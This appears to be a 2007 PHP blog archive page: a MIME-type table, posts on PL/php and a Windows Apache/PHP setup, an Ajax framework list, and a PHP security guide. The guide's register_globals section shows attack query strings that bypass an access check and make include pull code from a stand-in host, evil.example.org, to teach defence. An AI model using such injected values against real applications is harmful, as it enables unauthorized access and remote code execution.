application/x-pkcs7-certificates	p7b
application/x-pkcs7-certificates	spc
application/x-pkcs7-certreqresp	p7r
application/x-pkcs7-mime	p7c
application/x-pkcs7-mime	p7m
application/x-pkcs7-signature	p7s
application/x-sh	sh
application/x-shar	shar
application/x-shockwave-flash	swf
application/x-stuffit	sit
application/x-sv4cpio	sv4cpio
application/x-sv4crc	sv4crc
application/x-tar	tar
application/x-tcl	tcl
application/x-tex	tex
application/x-texinfo	texi
application/x-texinfo	texinfo
application/x-troff	roff
application/x-troff	t
application/x-troff	tr
application/x-troff-man	man
application/x-troff-me	me
application/x-troff-ms	ms
application/x-ustar	ustar
application/x-wais-source	src
application/x-x509-ca-cert	cer
application/x-x509-ca-cert	crt
application/x-x509-ca-cert	der
application/vnd.ms-pkipko	pko
application/zip	zip
audio/basic	au
audio/basic	snd
audio/mid	mid
audio/mid	rmi
audio/mpeg	mp3
audio/x-aiff	aif
audio/x-aiff	aifc
audio/x-aiff	aiff
audio/x-mpegurl	m3u
audio/x-pn-realaudio	ra
audio/x-pn-realaudio	ram
audio/x-wav	wav
image/bmp	bmp
image/cis-cod	cod
image/gif	gif
image/ief	ief
image/jpeg	jpe
image/jpeg	jpeg
image/jpeg	jpg
image/pipeg	jfif
image/svg+xml	svg
image/tiff	tif
image/tiff	tiff
image/x-cmu-raster	ras
image/x-cmx	cmx
image/x-icon	ico
image/x-portable-anymap	pnm
image/x-portable-bitmap	pbm
image/x-portable-graymap	pgm
image/x-portable-pixmap	ppm
image/x-rgb	rgb
image/x-xbitmap	xbm
image/x-xpixmap	xpm
image/x-xwindowdump	xwd
message/rfc822	mht
message/rfc822	mhtml
message/rfc822	nws
text/css	css
text/h323	323
text/html	htm
text/html	html
text/html	stm
text/iuls	uls
text/plain	bas
text/plain	c
text/plain	h
text/plain	txt
text/richtext	rtx
text/scriptlet	sct
text/tab-separated-values	tsv
text/webviewhtml	htt
text/x-component	htc
text/x-setext	etx
text/x-vcard	vcf
video/mpeg	mp2
video/mpeg	mpa
video/mpeg	mpe
video/mpeg	mpeg
video/mpeg	mpg
video/mpeg	mpv2
video/quicktime	mov
video/quicktime	qt
video/x-la-asf	lsf
video/x-la-asf	lsx
video/x-ms-asf	asf
video/x-ms-asf	asr
video/x-ms-asf	asx
video/x-msvideo	avi
video/x-sgi-movie	movie
x-world/x-vrml	flr
x-world/x-vrml	vrml
x-world/x-vrml	wrl
x-world/x-vrml	wrz
x-world/x-vrml	xaf
x-world/x-vrml	xof

MIME Types By File Extension

Extension	Type/sub-type
*	application/octet-stream
323	text/h323
acx	application/internet-property-stream
ai	application/postscript
aif	audio/x-aiff
aifc	audio/x-aiff
aiff	audio/x-aiff
asf	video/x-ms-asf
asr	video/x-ms-asf
asx	video/x-ms-asf
au	audio/basic
avi	video/x-msvideo
axs	application/olescript
bas	text/plain
bcpio	application/x-bcpio
bin	application/octet-stream
bmp	image/bmp
c	text/plain
cat	application/vnd.ms-pkiseccat
cdf	application/x-cdf
cer	application/x-x509-ca-cert
class	application/octet-stream
clp	application/x-msclip
cmx	image/x-cmx
cod	image/cis-cod
cpio	application/x-cpio
crd	application/x-mscardfile
crl	application/pkix-crl
crt	application/x-x509-ca-cert
csh	application/x-csh
css	text/css
dcr	application/x-director
der	application/x-x509-ca-cert
dir	application/x-director
dll	application/x-msdownload
dms	application/octet-stream
doc	application/msword
dot	application/msword
dvi	application/x-dvi
dxr	application/x-director
eps	application/postscript
etx	text/x-setext
evy	application/envoy
exe	application/octet-stream
fif	application/fractals
flr	x-world/x-vrml
gif	image/gif
gtar	application/x-gtar
gz	application/x-gzip
h	text/plain
hdf	application/x-hdf
hlp	application/winhlp
hqx	application/mac-binhex40
hta	application/hta
htc	text/x-component
htm	text/html
html	text/html
htt	text/webviewhtml
ico	image/x-icon
ief	image/ief
iii	application/x-iphone
ins	application/x-internet-signup
isp	application/x-internet-signup
jfif	image/pipeg
jpe	image/jpeg
jpeg	image/jpeg
jpg	image/jpeg
js	application/x-javascript
latex	application/x-latex
lha	application/octet-stream
lsf	video/x-la-asf
lsx	video/x-la-asf
lzh	application/octet-stream
m13	application/x-msmediaview
m14	application/x-msmediaview
m3u	audio/x-mpegurl
man	application/x-troff-man
mdb	application/x-msaccess
me	application/x-troff-me
mht	message/rfc822
mhtml	message/rfc822
mid	audio/mid
mny	application/x-msmoney
mov	video/quicktime
movie	video/x-sgi-movie
mp2	video/mpeg
mp3	audio/mpeg
mpa	video/mpeg
mpe	video/mpeg
mpeg	video/mpeg
mpg	video/mpeg
mpp	application/vnd.ms-project
mpv2	video/mpeg
ms	application/x-troff-ms
mvb	application/x-msmediaview
nws	message/rfc822
oda	application/oda
p10	application/pkcs10
p12	application/x-pkcs12
p7b	application/x-pkcs7-certificates
p7c	application/x-pkcs7-mime
p7m	application/x-pkcs7-mime
p7r	application/x-pkcs7-certreqresp
p7s	application/x-pkcs7-signature
pbm	image/x-portable-bitmap
pdf	application/pdf
pfx	application/x-pkcs12
pgm	image/x-portable-graymap
pko	application/vnd.ms-pkipko
pma	application/x-perfmon
pmc	application/x-perfmon
pml	application/x-perfmon
pmr	application/x-perfmon
pmw	application/x-perfmon
pnm	image/x-portable-anymap
pot	application/vnd.ms-powerpoint
ppm	image/x-portable-pixmap
pps	application/vnd.ms-powerpoint
ppt	application/vnd.ms-powerpoint
prf	application/pics-rules
ps	application/postscript
pub	application/x-mspublisher
qt	video/quicktime
ra	audio/x-pn-realaudio
ram	audio/x-pn-realaudio
ras	image/x-cmu-raster
rgb	image/x-rgb
rmi	audio/mid
roff	application/x-troff
rtf	application/rtf
rtx	text/richtext
scd	application/x-msschedule
sct	text/scriptlet
setpay	application/set-payment-initiation
setreg	application/set-registration-initiation
sh	application/x-sh
shar	application/x-shar
sit	application/x-stuffit
snd	audio/basic
spc	application/x-pkcs7-certificates
spl	application/futuresplash
src	application/x-wais-source
sst	application/vnd.ms-pkicertstore
stl	application/vnd.ms-pkistl
stm	text/html
svg	image/svg+xml
sv4cpio	application/x-sv4cpio
sv4crc	application/x-sv4crc
swf	application/x-shockwave-flash
t	application/x-troff
tar	application/x-tar
tcl	application/x-tcl
tex	application/x-tex
texi	application/x-texinfo
texinfo	application/x-texinfo
tgz	application/x-compressed
tif	image/tiff
tiff	image/tiff
tr	application/x-troff
trm	application/x-msterminal
tsv	text/tab-separated-values
txt	text/plain
uls	text/iuls
ustar	application/x-ustar
vcf	text/x-vcard
vrml	x-world/x-vrml
wav	audio/x-wav
wcm	application/vnd.ms-works
wdb	application/vnd.ms-works
wks	application/vnd.ms-works
wmf	application/x-msmetafile
wps	application/vnd.ms-works
wri	application/x-mswrite
wrl	x-world/x-vrml
wrz	x-world/x-vrml
xaf	x-world/x-vrml
xbm	image/x-xbitmap
xla	application/vnd.ms-excel
xlc	application/vnd.ms-excel
xlm	application/vnd.ms-excel
xls	application/vnd.ms-excel
xlt	application/vnd.ms-excel
xlw	application/vnd.ms-excel
xof	x-world/x-vrml
xpm	image/x-xpixmap
xwd	image/x-xwindowdump
z	application/x-compress
zip	application/zip
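A table like this is typically used as a lookup from file extension to content type. The following is only a sketch: it copies a handful of rows from the table, and the mime_type_for() helper is a hypothetical name, not part of PHP.

```php
<?php

// A small excerpt of the extension table above; extend it as needed.
$mime_types = array(
    'css'  => 'text/css',
    'gif'  => 'image/gif',
    'htm'  => 'text/html',
    'html' => 'text/html',
    'jpg'  => 'image/jpeg',
    'pdf'  => 'application/pdf',
    'txt'  => 'text/plain',
    'zip'  => 'application/zip',
);

// Hypothetical helper: return the type for a file name, falling back to
// application/octet-stream (the catch-all entry in the table).
function mime_type_for($filename, $mime_types)
{
    $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));

    if (isset($mime_types[$extension])) {
        return $mime_types[$extension];
    }

    return 'application/octet-stream';
}

echo mime_type_for('Report.PDF', $mime_types), "\n";
echo mime_type_for('archive.unknown', $mime_types), "\n";
```

Keep in mind that an extension is only a hint supplied by whoever named the file, so it should not be trusted for security decisions.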

Sunday, August 12, 2007

PHP Procedural Language for PostgreSQL

What is PL/php?

PL/php is a procedural language with hooks into the PostgreSQL database system, intended to allow PHP functions to be written and used as functions inside the PostgreSQL database. It was written by Command Prompt, Inc. and has since been open sourced and licensed under the PHP and PostgreSQL (BSD) licenses.

Download and Installation

Please see the installation documentation for instructions on how to install PL/php 1.0. To install the new code, which only works with PostgreSQL 8.0 and 8.1 and is currently in development, see this page instead.

Creating the PL/php language

Please see the documentation on how to create the language in a database once the library is installed. If you are using PostgreSQL 8.1 you must follow these other instructions instead.

Apache 2, PHP 4 & PHP 5 on Windows XP

This is a comprehensive guide to installing and running Apache 2.2.4 with PHP 4.4.7 and PHP 5.2.3 on Windows XP. It covers all of the steps in detail with lots of screen grabs so you can follow the process visually.

Update: The guide has been updated for PHP 5.2.3. I have also created a new forum here. Please use it if you run into trouble following this guide; I'll be only too happy to help. You don't even need to register to post.

The Guide

I know that the number of sections looks daunting, but that is because I have split the guide up into small manageable chunks. It shouldn't take you longer than a couple of minutes to complete each section.

Downloads

Configure Windows XP for PHP

PHP 4 Settings

PHP 5 Settings

Create a local web site

Setting the Environment Variable

Install Apache

Install the Apache2 Handler

httpd.conf

Creating a Virtual Host

system32/drivers/etc/hosts

Bring Apache to life

Switching to PHP 5

Useful Extras

Adding another web site (detailed version)

Adding another web site (short version)

Build a PHP 4/5 switcher

Run PHP 5 as a module and PHP 4 as CGI together

Troubleshooting

Apache won't start

Your guide doesn't work

They've just released a new version of PHP! Now what?

Can't you just do it for me?

Don't be disheartened by the length of the guide! There is no reason why you can't complete the entire process in under 30 minutes, and you'll be rewarded with a versatile and feature-packed local development environment.

Who is this guide aimed at?

Everyone who posts in php-general / forums asking how to get PHP and Apache running on Windows so they can develop and test locally. Often they'll hit simple but annoying problems that can be easily fixed. I also wrote this as an alternative to using a 'WAMP' installer. Teaching yourself how to install and configure PHP/Apache is a very useful set of skills to have, and well worth adding to your knowledge set.

User Feedback

Since releasing this guide I've received some great emails from people who've had success with it. Here are some of my favourite quotes: "Thank you for your VERY helpful instructions! This point on I can now learn PHP a lot better on my own computer. Cheers!" (Patrick) - "I very much appreciate your guide - you made it really easy" (Terry) - "Richard, this is truly the best guide to setting up php and apache i've seen online. Thank you so much." (Edward) - "Thanks for the great and detailed guide" (Thijs). "Thank you very much for the php guide you spent a lot of hard work to make, the guide covered everything, screenshots, alternatives as well as any possible errors and was precise and right to the point, and because of it i finally have php installed on my computer and i can learn it more conviniently." (Gaurav)

Thanks guys :) BTW all the feedback I have received so far has been incorporated into the guide. Feel free to use the new forum (see below) to send your comments / suggestions.

WAMP Guide Forum

Need help on a more 'interactive' level? Then why not use the WAMP Guide Forum? Post any questions or problems you may have. You don't even need to register to join. We'll help you as much as we can.

Wednesday, August 8, 2007

PHP Ajax Frameworks

AJASON : AJASON is a PHP 5 library and JavaScript client
AjaxAC : AjaxAC is an open-source framework written in PHP
Ajax Agent : powerful open source framework for rapidly building Ajax or Rich Internet Applications (RIA)
Cajax : A PHP class library for writing powerful reloadless web user interfaces using Ajax (DHTML+server-side) style
CakePHP : Cake is a rapid development framework for PHP which uses commonly known design patterns like ActiveRecord, Association Data Mapping, Front Controller and MVC.
Claw : a convenient and intuitive way of development of PHP5 driven object oriented applications.
DutchPIPE : PHP object-oriented framework to turn sites into real-time, multi-user virtual environments
Flexible Ajax : Flexible Ajax is a handler to combine the remote scripting technology, also known as AJAX (Asynchronous Javascript and XML), with a php-based backend.
Guava : Groundwork Guava is a PHP-based application framework and environment.
HTML_AJAX : HTML_AJAX is a PEAR package for performing AJAX operations from PHP.
HTSWaf : The HTS Web Application Framework is a PHP and Javascript based framework designed to make simple web applications easy to design and implement.
My-BIC : My-BIC AJAX State of Mind for PHP harmony
PAJAJ : PHP Asynchronous Javascript and JSON
PAJAX : Remote (a)synchronous PHP objects in JavaScript
phpAjaxTags : phpAjaxTags is a port to PHP from java tag library AjaxTags.
PHPWebBuilder : PHPWebBuilder is a PHP framework designed following well-known object oriented designs and principles featuring a highly reusable components architecture, metadata based persistence and traditional GUI style programming support.
Qcodo : open-source PHP 5 framework
Simple AJAX : This tutorial demonstrates how to perform AJAX functionality simply and effectively, using the AJAX JSMX library, coupled with the JSON-PHP library.
symfony : open-source PHP5 web framework
TinyAjax : TinyAjax is a small php5 library that allows you to easily add AJAX-functionality to existing pages
xajax : Ajax-enable your PHP application with a simple toolkit that gets the job done fast.
XOAD : PHP based AJAX/XAP object oriented framework that allows you to create richer web applications
Zoop : Zoop is an object oriented framework for PHP based on a front controller. It is designed to be very fast and efficient and very nice for the programmer to work with.
Zephyr : Zephyr is an Ajax-based framework for PHP 5 developers.

Tuesday, August 7, 2007

PHP Security Guide

What Is Security?

Security is a measurement, not a characteristic.

It is unfortunate that many software projects list security as a simple requirement to be met. Is it secure? This question is as subjective as asking if something is hot.

Security must be balanced with expense.

It is easy and relatively inexpensive to provide a sufficient level of security for most applications. However, if your security needs are very demanding, because you're protecting information that is very valuable, then you must achieve a higher level of security at an increased cost. This expense must be included in the budget of the project.

Security must be balanced with usability.

It is not uncommon that steps taken to increase the security of a web application also decrease the usability. Passwords, session timeouts, and access control all create obstacles for a legitimate user. Sometimes these are necessary to provide adequate security, but there isn't one solution that is appropriate for every application. It is wise to be mindful of your legitimate users as you implement security measures.

Security must be part of the design.

If you do not design your application with security in mind, you are doomed to be constantly addressing new security vulnerabilities. Careful programming cannot make up for a poor design.

Basic Steps

Consider illegitimate uses of your application.

A secure design is only part of the solution. During development, when the code is being written, it is important to consider illegitimate uses of your application. Often, the focus is on making the application work as intended, and while this is necessary to deliver a properly functioning application, it does nothing to help make the application secure.

Educate yourself.

The fact that you are here is evidence that you care about security, and as trite as it may sound, this is the most important step. There are numerous resources available on the web and in print, and several resources are listed in the PHP Security Consortium's Library at http://phpsec.org/library/.

If nothing else, FILTER ALL EXTERNAL DATA.

Data filtering is the cornerstone of web application security in any language and on any platform. By initializing your variables and filtering all data that comes from an external source, you will address a majority of security vulnerabilities with very little effort. A whitelist approach is better than a blacklist approach. This means that you should consider all data invalid unless it can be proven valid (rather than considering all data valid unless it can be proven invalid).

Register Globals

The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. While it does not represent a security vulnerability, it is a security risk. Therefore, you should always develop and deploy applications with register_globals disabled.

Why is it a security risk? Good examples are difficult to produce for everyone, because it often requires a unique situation to make the risk clear. However, the most common example is that found in the PHP manual:

<?php

if (authenticated_user())
{
   $authorized = true;
}

if ($authorized)
{
   include '/highly/sensitive/data.php';
}

?>

With register_globals enabled, this page can be requested with ?authorized=1 in the query string to bypass the intended access control. Of course, this particular vulnerability is the fault of the developer, not register_globals, but this indicates the increased risk posed by the directive. Without it, ordinary global variables (such as $authorized in the example) are not affected by data submitted by the client. A best practice is to initialize all variables and to develop with error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development.
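A minimal sketch of the practice described above: the flag is given a known value before any check runs, and error reporting is set to E_ALL. The $session parameter and this simplified authenticated_user() are hypothetical stand-ins for a real authentication check. Wrapping the logic in a function is an extra assumption of this sketch; local variables inside a function are not populated by register_globals.

```php
<?php

// Report everything, including notices about uninitialized variables.
error_reporting(E_ALL);

// Hypothetical stand-in for the authenticated_user() check in the example.
function authenticated_user($session)
{
    return isset($session['user_id']);
}

function is_authorized($session)
{
    // Always start from a known value instead of relying on the variable
    // being unset.
    $authorized = false;

    if (authenticated_user($session)) {
        $authorized = true;
    }

    return $authorized;
}

var_dump(is_authorized(array()));                // bool(false)
var_dump(is_authorized(array('user_id' => 42))); // bool(true)
```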

Another example that illustrates how register_globals can be problematic is the following use of include with a dynamic path:

<?php

include "$path/script.php";

?>

With register_globals enabled, this page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following:

<?php

include 'http://evil.example.org/?/script.php';

?>

If allow_url_fopen is enabled (which it is by default, even in php.ini-recommended), this will include the output of http://evil.example.org/ just as if it were a local file. This is a major security vulnerability, and it is one that has been discovered in some popular open source applications.

Initializing $path can mitigate this particular risk, but so does disabling register_globals. Whereas a developer's mistake can lead to an uninitialized variable, disabling register_globals is a global configuration change that is far less likely to be overlooked.
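Going one step beyond initialization, an include path can be chosen from a fixed list so that client data never becomes part of the path itself. This is only a sketch of that idea: the directory names and the resolve_include_path() helper are hypothetical.

```php
<?php

// Hypothetical whitelist: the only directories a script may be included from.
$allowed_paths = array(
    'forms'   => '/inc/presentation',
    'reports' => '/inc/reports',
);

// Hypothetical helper: map a client-supplied key to a known-good path.
// Returns false when the key is not in the whitelist.
function resolve_include_path($key, $allowed_paths)
{
    if (is_string($key) && isset($allowed_paths[$key])) {
        return $allowed_paths[$key] . '/script.php';
    }

    return false;
}

var_dump(resolve_include_path('forms', $allowed_paths));
var_dump(resolve_include_path('http://evil.example.org/?', $allowed_paths));
```

Only a value that resolve_include_path() returns would then be passed to include; anything else is rejected before the filesystem or network is touched.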

The convenience that register_globals offers is wonderful, and those of us who have had to manually handle form data in the past appreciate this. However, using the $_POST and $_GET superglobal arrays is still very convenient, and it's not worth the added risk to enable register_globals. While I completely disagree with arguments that equate register_globals to poor security, I do recommend that it be disabled.

In addition to all of this, disabling
register_globals encourages developers to be mindful of the
origin of data, and this is an important characteristic of any
security-conscious developer.

Data Filtering

As stated previously, data filtering is the cornerstone of web
application security, and this is independent of programming language or
platform. It involves the mechanism by which you determine the validity of
data that is entering and exiting the application, and a good software design
can help developers to:

Ensure that data filtering cannot be bypassed,
Ensure that invalid data cannot be mistaken for valid data, and
Identify the origin of data.

Opinions about how to ensure that data filtering cannot be bypassed
vary, but there are two general approaches that seem to be the most common,
and both of these provide a sufficient level of assurance.

The Dispatch Method

One method is to have a single PHP script available directly from the
web (via URL). Everything else is a module included with
include or require as needed. This
method usually requires that a GET variable be passed along
with every URL, identifying the task. This GET variable can
be considered the replacement for the script name that would be used in a more
simplistic design. For example:

http://example.org/dispatch.php?task=print_form

The file dispatch.php is the only file within
document root. This allows a developer to do two important things:

Implement some global security measures at the top of
dispatch.php and be assured that these measures
cannot be bypassed.
Easily see that data filtering takes place when necessary, by
focusing on the control flow of a specific task.

To further explain this, consider the following example
dispatch.php script:

<?php

/* Global security measures */

switch ($_GET['task'])
{
   case 'print_form':
       include '/inc/presentation/form.inc';
       break;

   case 'process_form':
       $form_valid = false;
       include '/inc/logic/process.inc';
       if ($form_valid)
       {
           include '/inc/presentation/end.inc';
       }
       else
       {
           include '/inc/presentation/form.inc';
       }
       break;

   default:
       include '/inc/presentation/index.inc';
       break;
}

?>

If this is the only public PHP script, then it should be clear that the
design of this application ensures that any global security measures taken at
the top cannot be bypassed. It also lets a developer easily see the control
flow for a specific task. For example, instead of glancing through a lot of
code, it is easy to see that end.inc is only displayed to a
user when $form_valid is true, and
because it is initialized as false just before
process.inc is included, it is clear that the logic within
process.inc must set it to true,
otherwise the form is displayed again (presumably with appropriate error
messages).

Note
If you use a directory index file such as index.php (instead of dispatch.php), you can use URLs such as http://example.org/?task=print_form. You can also use the Apache ForceType directive or mod_rewrite to accommodate URLs such as http://example.org/app/print-form.

The Include Method

Another approach is to have a single module that is responsible for all
security measures. This module is included at the top (or very near the top)
of all PHP scripts that are public (available via URL). Consider the following
security.inc script:

<?php

switch ($_POST['form'])
{
   case 'login':
       $allowed = array();
       $allowed[] = 'form';
       $allowed[] = 'username';
       $allowed[] = 'password';

       $sent = array_keys($_POST);

       if ($allowed == $sent)
       {
           include '/inc/logic/process.inc';
       }

       break;
}

?>

In this example, each form that is submitted is expected to have a form variable named form that uniquely identifies it, and security.inc has a separate case to handle the data filtering for that particular form. An example of an HTML form that fulfills this requirement is as follows:

<form action="/receive.php" method="POST">
<input type="hidden" name="form" value="login" />
<p>Username:
<input type="text" name="username" /></p>
<p>Password:
<input type="password" name="password" /></p>

<input type="submit" />
</form>

An array named $allowed is used to identify exactly which form variables are allowed, and the list of variables actually submitted must match it exactly in order for the form to be processed. Control flow is determined elsewhere, and process.inc is where the actual data filtering takes place.
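Because == on two arrays compares key/value pairs, the comparison in security.inc also depends on the order in which the fields arrive. If that is not wanted, one possible variation (an assumption of mine, not part of the original script) is to sort both lists before comparing them. The fields_match() helper is a hypothetical name.

```php
<?php

// Hypothetical helper: true when $sent contains exactly the allowed field
// names, regardless of the order in which they were submitted.
function fields_match($allowed, $sent)
{
    // Both arrays are passed by value, so sorting does not affect the caller.
    sort($allowed);
    sort($sent);

    return $allowed === $sent;
}

$allowed = array('form', 'username', 'password');

var_dump(fields_match($allowed, array('username', 'form', 'password')));
var_dump(fields_match($allowed, array('form', 'username', 'password', 'admin')));
```

In security.inc, the second argument would be array_keys($_POST), as in the original example.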

Note
A good way to ensure that security.inc is always included at the top of every PHP script is to use the auto_prepend_file directive.

Filtering Examples

It is important to take a whitelist approach to your data filtering, and
while it is impossible to give examples for every type of form data you may
encounter, a few examples can help to illustrate a sound approach.

The following validates an email address:

<?php

$clean = array();

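// The D modifier makes $ match only at the very end of the string,
// so a value with a trailing newline is rejected.
$email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/iD';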

if (preg_match($email_pattern, $_POST['email']))
{
   $clean['email'] = $_POST['email'];
}

?>

The following ensures that $_POST['color'] is red, green, or blue:

<?php

$clean = array();

switch ($_POST['color'])
{
   case 'red':
   case 'green':
   case 'blue':
       $clean['color'] = $_POST['color'];
       break;
}

?>

The following example ensures that $_POST['num'] is
an integer:

<?php

$clean = array();

// Use ===: with ==, numeric strings such as '10.0' or ' 10' compare equal to '10'.
if ($_POST['num'] === strval(intval($_POST['num'])))
{
   $clean['num'] = $_POST['num'];
}

?>

The following example ensures that $_POST['num'] is a
float:

<?php

$clean = array();

if ($_POST['num'] == strval(floatval($_POST['num'])))
{
   $clean['num'] = $_POST['num'];
}

?>
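On PHP 5.2 and later, the filter extension offers another way to express the same whitelist checks. The sketch below assumes that extension is available; filter_input_data() is a hypothetical helper name, and the input array stands in for $_POST.

```php
<?php

// Hypothetical helper: copy only validated fields from $input into $clean.
function filter_input_data($input)
{
    $clean = array();

    if (isset($input['num'])) {
        $num = filter_var($input['num'], FILTER_VALIDATE_INT);
        // Compare with false explicitly: a valid "0" becomes int(0).
        if ($num !== false) {
            $clean['num'] = $num;
        }
    }

    if (isset($input['email'])) {
        $email = filter_var($input['email'], FILTER_VALIDATE_EMAIL);
        if ($email !== false) {
            $clean['email'] = $email;
        }
    }

    return $clean;
}

var_dump(filter_input_data(array('num' => '42', 'email' => 'user@example.org')));
var_dump(filter_input_data(array('num' => '1e1', 'email' => "bad\n@example.org")));
```

As with the examples above, anything that fails validation simply never reaches $clean.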

Naming Conventions

Each of the previous examples makes use of an array named $clean. This illustrates a good practice that can help developers identify whether data is potentially tainted. You should never make a practice of validating data and leaving it in $_POST or $_GET, because it is important for developers to always be suspicious of data within these superglobal arrays.

In addition, a more liberal use of $clean can allow
you to consider everything else to be tainted, and this more closely resembles
a whitelist approach and therefore offers an increased level of
security.

If you only store data in $clean after it has been
validated, the only risk in a failure to validate something is that you might
reference an array element that doesn't exist rather than potentially tainted
data.

Timing

Once a PHP script begins processing, the entire HTTP request has been
received. This means that the user does not have another opportunity to send
data, and therefore no data can be injected into your script (even if
register_globals is enabled). This is why initializing your
variables is such a good practice.

Error Reporting

In versions of PHP prior to PHP 5, released 13 Jul 2004, error reporting
is pretty simplistic. Aside from careful programming, it relies mostly upon a
few specific PHP configuration directives:

error_reporting
This directive sets the level of error reporting desired. It is
strongly suggested that you set this to E_ALL for
both development and production.
display_errors
This directive determines whether errors should be displayed on
the screen (included in the output). You should develop with this set
to On, so that you can be alerted to errors during
development, and you should set this to Off for
production, so that errors are hidden from the users (and potential
attackers).
log_errors
This directive determines whether errors should be written to a
log. While this may raise performance concerns, it is desirable that
errors are rare. If logging errors presents a strain on the disk due
to the heavy I/O, you probably have larger concerns than the
performance of your application. You should set this directive to
On in production.
error_log
This directive indicates the location of the log file to which
errors are written. Make sure that the web server has write privileges
for the specified file.

Having error_reporting set to E_ALL will help to enforce the initialization of variables, because a reference to an undefined variable generates a notice.

Note
Each of these directives can be set with ini_set(), in case you do not have access to php.ini or another method of setting these directives.

A good reference on all error handling and reporting functions is in the PHP manual:

http://www.php.net/manual/en/ref.errorfunc.php

PHP 5 includes exception handling. For more information, see:

http://www.php.net/manual/language.exceptions.php
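As a sketch of the ini_set() approach mentioned in the note, the following applies production-style values for the four directives at the top of a script. The log file location is a hypothetical choice for illustration; use a path that suits your server.

```php
<?php

// Report every error level, including notices for undefined variables.
error_reporting(E_ALL);

// Production-style settings: hide errors from visitors, log them instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Hypothetical log location; the web server needs write access to it.
ini_set('error_log', sys_get_temp_dir() . '/php-app-errors.log');

echo ini_get('log_errors'), "\n";
```

During development, display_errors would be switched to '1' instead, as recommended above.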
